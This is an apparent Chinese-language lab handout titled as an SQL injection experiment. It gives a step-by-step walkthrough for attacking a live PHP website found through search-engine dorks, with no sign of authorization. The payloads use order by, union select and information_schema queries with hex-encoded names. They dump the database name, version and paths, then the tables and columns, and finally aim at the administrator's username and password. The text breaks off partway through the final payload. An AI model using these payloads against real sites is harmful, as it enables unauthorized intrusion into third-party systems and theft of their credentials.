第十章 实验四 SQL注入实例.docVIP

SQL注入实例 ?如果你想要入侵一个网站，那么你首先要知道你将要入侵的网站是哪一种类型的。 方法是：打开一个网页，右键—属性，从“地址（URL）”查看网站属于哪种类型。 有五种类型的网站页面URL标准。 相关文档：/seofuwu/seozhenduan/url.html 例子：基于PHP类型的网站（一种在服务器端执行的嵌入HTML文档的脚本语言，主要用来连接动态数据库、制作动态网站。现在被很多网站编程人员广泛运用） 地址：/news_main.php?id=47 如果你想要试验一次，但是这个网站已经不能被修复的话，那么你可以搜索类似的网站。 搜索语句可以是：inurl:index.php?id= 或inurl:show.php?id= 下面是我找的一个例子，供大家参考： 实验演示： 第一步：寻找可以入侵的网站。 方法是：打开PHP类型的网址，在注入点后加一个单引号（‘）按回车。如果网页出错，那么该网站有漏洞。 下面是我选的网站的截图比较，正常网页如图1所示，加(‘)出现的错误网页如图2所示。 图1 图2 第二步：进一步验证此链接是可以注入的。（与运算） （1）在注入点后加“+and+1=1”页面显示正常，如图3所示。 图3 （2）在注入点后加“+and+1=0”，页面显示错误，如图4所示。 图4 第三步：获得字段数 在注入点后面加入“+order+by+1”，页面显示正常，如图5所示。 图5 （2）注入点后面换成“+order+by+20”，出现错误界面，，如图6所示。 图6 （3）用二分法进一步判断出现错误的字段数，再注入点后面换成：“+order+by+10”，“+order+by+5”，“+order+by+8”，“+order+by+9”，页面均显示正常，说明，正确的字段是1,2,3,4,5,6,7,8,9。如图7所示。 图7 第四步：获得显示位 再注入点后面加入“+and+1=2+union+select+1,2,3,4,5,6,7,8,9”，如图8所示，显示的数字即是显示位：2，4，7 图8 第五步：获得该网站数据库的名字、版本、数据库所在路径等 下面是获得数据库信息的一些函数： user() 数据库用户名 database() 当前使用的数据库名 version() 数据库版本 datadir()或@@datadir 数据库数据所在路径 basedir()或@@basedir 数据库安装路径 在出错的字段位置加上上面的函数，即可获得相对应的信息，如图9所示 图9 第六步：获得当前使用的数据库名的hex值，并暴漏该网站数据库的字段名 （1）数据库名的还原需要使用协助工具：小葵多功能转换工具，把当前使用的数据库名jmjt转化为：0x6A6D6A74，转换结果如图10所示。 图10 （2）注入点后面加下面的公式获得数据库的字段名： “+and+1=2+union+select+1,GROUP_CONCAT(DISTINCT+table_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=0x6A6D6A74”（数据库表名的hex值） GROUP_CONCAT(DISTINCT+table_name)放在显示位 即可获得相对应SQL数据库中的字段名，如图11所示。报表中的具体字段显示如图12。 图11 图12 第七步：在所有的字段中找数据库管理员的用户名，并获得hex值 找到管理员的字段名（管理员：administrator） 猜测：这个很显然就判断是useradmin（大多数），因为大多数人都是admin、user、Pass等一些常用单词搭配一起标记。 把管理员的字段名再次使用小葵多功能转换工具获得其hex值，如图13所示。 图13 第八步：借助管理员用户名的hex值，获得字段useradmin的子字段 注入点后面加下面公式获得管理员的子字段：“+and+1=2+union+select+1,concat(GROUP_CONCAT(DISTINCT+column_name)),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573657261646D696E”（管理员用户名的hex值） concat(GROUP_CONCAT(DISTINCT+column_name))放在显示位 获得的子字段显示如图14所示。 图14 第九步：从管理员的子字段中获得管理员的登陆账号和密码 从上面的子字段中不难看出，子字段中有账号和密码，在注入点后面加上下面公式 “+and+1=2+union